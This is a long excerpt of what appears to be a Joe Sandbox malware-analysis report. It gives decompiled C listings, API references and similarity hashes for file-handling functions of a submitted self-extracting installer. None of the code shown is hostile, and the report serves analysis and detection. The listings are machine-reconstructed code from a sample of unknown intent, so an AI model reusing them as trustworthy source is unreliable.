                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AttributesFileItemText
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                                • API String ID: 3625706803-2312194364
                                                                                                                                                                                                                                                • Opcode ID: 8eff0ce2bdcc9daf77648b4e1408f3f8a88e830fe493bab3270921f041dc2eda
                                                                                                                                                                                                                                                • Instruction ID: 40408f4d2313da32803b5c5a7b0201057bca7bf2c5476d6babe9678fe1db6fc3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8eff0ce2bdcc9daf77648b4e1408f3f8a88e830fe493bab3270921f041dc2eda
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C04103362042059BCB659F28DD486FB77F5AB4530AF044668DC8697286EA32DECEC760
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00054C37 Relevance: 4.5, APIs: 3, Instructions: 39timeCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00054C37(signed int __ecx, int __edx, int _a4) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				FILETIME* _t14;
				int _t15;
				signed int _t21;

				_t21 = __ecx * 0x18;
				if( *((intOrPtr*)(_t21 + 0x58d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
					L5:
					return 0;
				} else {
					_t14 =  &_v12;
					_t15 = SetFileTime( *(_t21 + 0x58d74), _t14, _t14, _t14); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 1;
				}
			}








                                                                                                                                                                                                                                                0x00054c40
                                                                                                                                                                                                                                                0x00054c4a
                                                                                                                                                                                                                                                0x00054c8d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00054c70
                                                                                                                                                                                                                                                0x00054c70
                                                                                                                                                                                                                                                0x00054c7e
                                                                                                                                                                                                                                                0x00054c86
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00054c8a

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • DosDateTimeToFileTime.KERNEL32 ref: 00054C54
                                                                                                                                                                                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00054C66
                                                                                                                                                                                                                                                • SetFileTime.KERNELBASE(?,?,?,?), ref: 00054C7E
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Time$File$DateLocal
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2071732420-0
                                                                                                                                                                                                                                                • Opcode ID: 43b8eac59e9cdcf0221faefe09e5b3f972a77eeb2de665ad9dfe0c08af853472
                                                                                                                                                                                                                                                • Instruction ID: af539deacb17653650719ee11cedf309a3a86949961ccb2f87ffb1a1e9188f8d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 43b8eac59e9cdcf0221faefe09e5b3f972a77eeb2de665ad9dfe0c08af853472
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 57F06D72601208ABABA49FB5CC489FB7BECEB45346B44462AAD16D2050EA34D958C7A0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 0005487A Relevance: 3.1, APIs: 2, Instructions: 59fileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                                                                                                                			E0005487A(CHAR* __ecx, signed int __edx) {
				void* _t7;
				CHAR* _t11;
				long _t18;
				long _t23;

				_t11 = __ecx;
				asm("sbb edi, edi");
				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
				if((__edx & 0x00000100) == 0) {
					asm("sbb esi, esi");
					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
				} else {
					if((__edx & 0x00000400) == 0) {
						asm("sbb esi, esi");
						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
					} else {
						_t23 = 1;
					}
				}
				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
				if(_t7 != 0xffffffff || _t23 == 3) {
					return _t7;
				} else {
					E0005490C(_t11);
					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
				}
			}







                                                                                                                                                                                                                                                0x00054880
                                                                                                                                                                                                                                                0x0005488c
                                                                                                                                                                                                                                                0x00054894
                                                                                                                                                                                                                                                0x000548a0
                                                                                                                                                                                                                                                0x000548c9
                                                                                                                                                                                                                                                0x000548ce
                                                                                                                                                                                                                                                0x000548a2
                                                                                                                                                                                                                                                0x000548a8
                                                                                                                                                                                                                                                0x000548b7
                                                                                                                                                                                                                                                0x000548bc
                                                                                                                                                                                                                                                0x000548aa
                                                                                                                                                                                                                                                0x000548ac
                                                                                                                                                                                                                                                0x000548ac
                                                                                                                                                                                                                                                0x000548a8
                                                                                                                                                                                                                                                0x000548de
                                                                                                                                                                                                                                                0x000548e7
                                                                                                                                                                                                                                                0x0005490b
                                                                                                                                                                                                                                                0x000548ee
                                                                                                                                                                                                                                                0x000548f0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00054902

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00054A23,?,00054F67,*MEMCAB,00008000,00000180), ref: 000548DE
                                                                                                                                                                                                                                                • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00054F67,*MEMCAB,00008000,00000180), ref: 00054902
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                                                • Opcode ID: 12c0181d36102e4aa71de0a7f1fce9351dc008d2a7b622e026d3e5b49893b2a5
                                                                                                                                                                                                                                                • Instruction ID: 16b1493cceefb0c91c76bdf62fc19bb36faf45f540adcc6590f5bdc2cd080bc2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 12c0181d36102e4aa71de0a7f1fce9351dc008d2a7b622e026d3e5b49893b2a5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD014BA3E1167026F36440294C8DFFB555CDB9673AF1B0335BDAAE71D2D9645C8881E0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00054AD0 Relevance: 3.0, APIs: 2, Instructions: 47fileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                                                                                                                			E00054AD0(signed int _a4, void* _a8, long _a12) {
				signed int _t9;
				int _t12;
				signed int _t14;
				signed int _t15;
				void* _t20;
				struct HWND__* _t21;
				signed int _t24;
				signed int _t25;

				_t20 =  *0x5858c; // 0x270
				_t9 = E00053680(_t20);
				if( *0x591d8 == 0) {
					_push(_t24);
					_t12 = WriteFile( *(0x58d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
					if(_t12 != 0) {
						_t25 = _a12;
						if(_t25 != 0xffffffff) {
							_t14 =  *0x59400; // 0xf7c60
							_t15 = _t14 + _t25;
							 *0x59400 = _t15;
							if( *0x58184 != 0) {
								_t21 =  *0x58584; // 0x0
								if(_t21 != 0) {
									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x593f8, 0);
								}
							}
						}
					} else {
						_t25 = _t24 | 0xffffffff;
					}
					return _t25;
				} else {
					return _t9 | 0xffffffff;
				}
			}











                                                                                                                                                                                                                                                0x00054ad5
                                                                                                                                                                                                                                                0x00054adb
                                                                                                                                                                                                                                                0x00054ae7
                                                                                                                                                                                                                                                0x00054aee
                                                                                                                                                                                                                                                0x00054b05
                                                                                                                                                                                                                                                0x00054b0d
                                                                                                                                                                                                                                                0x00054b14
                                                                                                                                                                                                                                                0x00054b1a
                                                                                                                                                                                                                                                0x00054b1c
                                                                                                                                                                                                                                                0x00054b21
                                                                                                                                                                                                                                                0x00054b2a
                                                                                                                                                                                                                                                0x00054b2f
                                                                                                                                                                                                                                                0x00054b31
                                                                                                                                                                                                                                                0x00054b39
                                                                                                                                                                                                                                                0x00054b54
                                                                                                                                                                                                                                                0x00054b54
                                                                                                                                                                                                                                                0x00054b39
                                                                                                                                                                                                                                                0x00054b2f
                                                                                                                                                                                                                                                0x00054b0f
                                                                                                                                                                                                                                                0x00054b0f
                                                                                                                                                                                                                                                0x00054b0f
                                                                                                                                                                                                                                                0x00054b5e
                                                                                                                                                                                                                                                0x00054ae9
                                                                                                                                                                                                                                                0x00054aed
                                                                                                                                                                                                                                                0x00054aed

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00053680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0005369F
                                                                                                                                                                                                                                                  • Part of subcall function 00053680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 000536B2
                                                                                                                                                                                                                                                  • Part of subcall function 00053680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 000536DA
                                                                                                                                                                                                                                                • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00054B05
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1084409-0
                                                                                                                                                                                                                                                • Opcode ID: 50436bfe1aa1575a535518efe91f7ebf676e93d878ac3065b7657f33f51fafc8
                                                                                                                                                                                                                                                • Instruction ID: 8aa0e01e7243996bcbf2abc9c6df6bcae32382bd7ed8218986ef77164edd4921
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 50436bfe1aa1575a535518efe91f7ebf676e93d878ac3065b7657f33f51fafc8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 83016D71200301ABEB548F58DC15BE77799A74472BF148225ED39AB1E0DB78D855CB50
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 0005658A Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E0005658A(char* __ecx, void* __edx, char* _a4) {
				intOrPtr _t4;
				char* _t6;
				char* _t8;
				void* _t10;
				void* _t12;
				char* _t16;
				intOrPtr* _t17;
				void* _t18;
				char* _t19;

				_t16 = __ecx;
				_t10 = __edx;
				_t17 = __ecx;
				_t1 = _t17 + 1; // 0x58b3f
				_t12 = _t1;
				do {
					_t4 =  *_t17;
					_t17 = _t17 + 1;
				} while (_t4 != 0);
				_t18 = _t17 - _t12;
				_t2 = _t18 + 1; // 0x58b40
				if(_t2 < __edx) {
					_t19 = _t18 + __ecx;
					if(_t19 > __ecx) {
						_t8 = CharPrevA(__ecx, _t19); // executed
						if( *_t8 != 0x5c) {
							 *_t19 = 0x5c;
							_t19 =  &(_t19[1]);
						}
					}
					_t6 = _a4;
					 *_t19 = 0;
					while( *_t6 == 0x20) {
						_t6 = _t6 + 1;
					}
					return E000516B3(_t16, _t10, _t6);
				}
				return 0x8007007a;
			}












                                                                                                                                                                                                                                                0x00056592
                                                                                                                                                                                                                                                0x00056594
                                                                                                                                                                                                                                                0x00056596
                                                                                                                                                                                                                                                0x00056598
                                                                                                                                                                                                                                                0x00056598
                                                                                                                                                                                                                                                0x0005659b
                                                                                                                                                                                                                                                0x0005659b
                                                                                                                                                                                                                                                0x0005659d
                                                                                                                                                                                                                                                0x0005659e
                                                                                                                                                                                                                                                0x000565a2
                                                                                                                                                                                                                                                0x000565a4
                                                                                                                                                                                                                                                0x000565a9
                                                                                                                                                                                                                                                0x000565b2
                                                                                                                                                                                                                                                0x000565b6
                                                                                                                                                                                                                                                0x000565ba
                                                                                                                                                                                                                                                0x000565c3
                                                                                                                                                                                                                                                0x000565c5
                                                                                                                                                                                                                                                0x000565c8
                                                                                                                                                                                                                                                0x000565c8
                                                                                                                                                                                                                                                0x000565c3
                                                                                                                                                                                                                                                0x000565c9
                                                                                                                                                                                                                                                0x000565cc
                                                                                                                                                                                                                                                0x000565d2
                                                                                                                                                                                                                                                0x000565d1
                                                                                                                                                                                                                                                0x000565d1
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000565dc
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CharPrevA.USER32(00058B3E,00058B3F,00000001,00058B3E,-00000003,?,000560EC,00051140,?), ref: 000565BA
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CharPrev
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 122130370-0
                                                                                                                                                                                                                                                • Opcode ID: 3bf139d9f821647bc6796b603fadd037fa53ab2d118a8d96a16b2dc770137876
                                                                                                                                                                                                                                                • Instruction ID: d4650c37fbe090db3e7e7ee27b19497f5ecd752b520c5f548c3b5a76769c5ca6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3bf139d9f821647bc6796b603fadd037fa53ab2d118a8d96a16b2dc770137876
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 16F042321447509BE331051D9884BA7BFDD9B86352F54015EECDAC3205EA574D4D83A4
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 0005621E Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                                                                                                                			E0005621E() {
				signed int _v8;
				char _v268;
				signed int _t5;
				void* _t9;
				void* _t13;
				void* _t19;
				void* _t20;
				signed int _t21;

				_t5 =  *0x58004; // 0x5a679bd9
				_v8 = _t5 ^ _t21;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					0x4f0 = 2;
					_t9 = E0005597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
				} else {
					E000544B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
					 *0x59124 = E00056285();
					_t9 = 0;
				}
				return E00056CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
			}











                                                                                                                                                                                                                                                0x00056229
                                                                                                                                                                                                                                                0x00056230
                                                                                                                                                                                                                                                0x00056247
                                                                                                                                                                                                                                                0x0005626a
                                                                                                                                                                                                                                                0x00056272
                                                                                                                                                                                                                                                0x00056249
                                                                                                                                                                                                                                                0x00056255
                                                                                                                                                                                                                                                0x0005625f
                                                                                                                                                                                                                                                0x00056264
                                                                                                                                                                                                                                                0x00056264
                                                                                                                                                                                                                                                0x00056284

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0005623F
                                                                                                                                                                                                                                                  • Part of subcall function 000544B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00054518
                                                                                                                                                                                                                                                  • Part of subcall function 000544B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00054554
                                                                                                                                                                                                                                                  • Part of subcall function 00056285: GetLastError.KERNEL32(00055BBC), ref: 00056285
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 381621628-0
                                                                                                                                                                                                                                                • Opcode ID: a5f59f93b91628f5424284c191708ec4220510be2090a61c397bfb6e1d0ed935
                                                                                                                                                                                                                                                • Instruction ID: b4c998543d396857e4a94e26d7a2e4741bbbdeae099c37621a1ea0565c1d1e5f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a5f59f93b91628f5424284c191708ec4220510be2090a61c397bfb6e1d0ed935
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 10F0B470700308ABEB90EB748D06BFF36ACDB44302F800069AD85D7082DD799D488750
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00054B60 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00054B60(signed int _a4) {
				signed int _t9;
				signed int _t15;

				_t15 = _a4 * 0x18;
				if( *((intOrPtr*)(_t15 + 0x58d64)) != 1) {
					_t7 = _t15 + 0x58d74; // 0x3550cd44, executed
					_t9 = FindCloseChangeNotification( *_t7); // executed
					if(_t9 == 0) {
						return _t9 | 0xffffffff;
					}
					 *((intOrPtr*)(_t15 + 0x58d60)) = 1;
					return 0;
				}
				 *((intOrPtr*)(_t15 + 0x58d60)) = 1;
				 *((intOrPtr*)(_t15 + 0x58d68)) = 0;
				 *((intOrPtr*)(_t15 + 0x58d70)) = 0;
				 *((intOrPtr*)(_t15 + 0x58d6c)) = 0;
				return 0;
			}





                                                                                                                                                                                                                                                0x00054b66
                                                                                                                                                                                                                                                0x00054b74
                                                                                                                                                                                                                                                0x00054b92
                                                                                                                                                                                                                                                0x00054b98
                                                                                                                                                                                                                                                0x00054ba0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00054bac
                                                                                                                                                                                                                                                0x00054ba4
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00054ba4
                                                                                                                                                                                                                                                0x00054b78
                                                                                                                                                                                                                                                0x00054b7e
                                                                                                                                                                                                                                                0x00054b84
                                                                                                                                                                                                                                                0x00054b8a
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(3550CD44,00000000,00000000,?,00054FA1,00000000), ref: 00054B98
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2591292051-0
                                                                                                                                                                                                                                                • Opcode ID: 71c6dcb61996268ec4bde2493460705c436e4eec57eaa4aa842ba723fe7f8f12
                                                                                                                                                                                                                                                • Instruction ID: af992d4b4d168962fa52cf8b2d7474c8b29600b426586a928a47fdfd6dd78b02
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 71c6dcb61996268ec4bde2493460705c436e4eec57eaa4aa842ba723fe7f8f12
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E7F01231500B089E57718F3BCC016D7BBF4EB95363310992E9C6EE21D0EB30A445CBA0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 000566AE Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E000566AE(CHAR* __ecx) {
				unsigned int _t1;

				_t1 = GetFileAttributesA(__ecx); // executed
				if(_t1 != 0xffffffff) {
					return  !(_t1 >> 4) & 0x00000001;
				} else {
					return 0;
				}
			}




                                                                                                                                                                                                                                                0x000566b1
                                                                                                                                                                                                                                                0x000566ba
                                                                                                                                                                                                                                                0x000566c7
                                                                                                                                                                                                                                                0x000566bc
                                                                                                                                                                                                                                                0x000566be
                                                                                                                                                                                                                                                0x000566be

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNELBASE(?,00054777,?,00054E38,?), ref: 000566B1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                                • Opcode ID: c481236b8759b52b2592e891fa4995ad700d22b52d4ac2345f8bf224ef79191e
                                                                                                                                                                                                                                                • Instruction ID: 5650797b73414f5b83d536e4064d9d45c23c1ec0856db9060828f11de816b0c5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c481236b8759b52b2592e891fa4995ad700d22b52d4ac2345f8bf224ef79191e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D6B09276232541426A6006316C2955B2881E7C233B7E42B90F032C12E0CA3ED84AD004
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00054CA0 Relevance: 1.3, APIs: 1, Instructions: 8memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00054CA0(long _a4) {
				void* _t2;

				_t2 = GlobalAlloc(0, _a4); // executed
				return _t2;
			}




                                                                                                                                                                                                                                                0x00054caa
                                                                                                                                                                                                                                                0x00054cb1

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GlobalAlloc.KERNELBASE(00000000,?), ref: 00054CAA
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocGlobal
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3761449716-0
                                                                                                                                                                                                                                                • Opcode ID: b6bfcf21a8ce19faabca06939923736b28c3216a4a31b44b07daf00fdcd25bae
                                                                                                                                                                                                                                                • Instruction ID: bf15e89b5beaf2a0fe3b8389d0b96b30838cf77a58bd82ebf27a3bdeb1e89ccb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b6bfcf21a8ce19faabca06939923736b28c3216a4a31b44b07daf00fdcd25bae
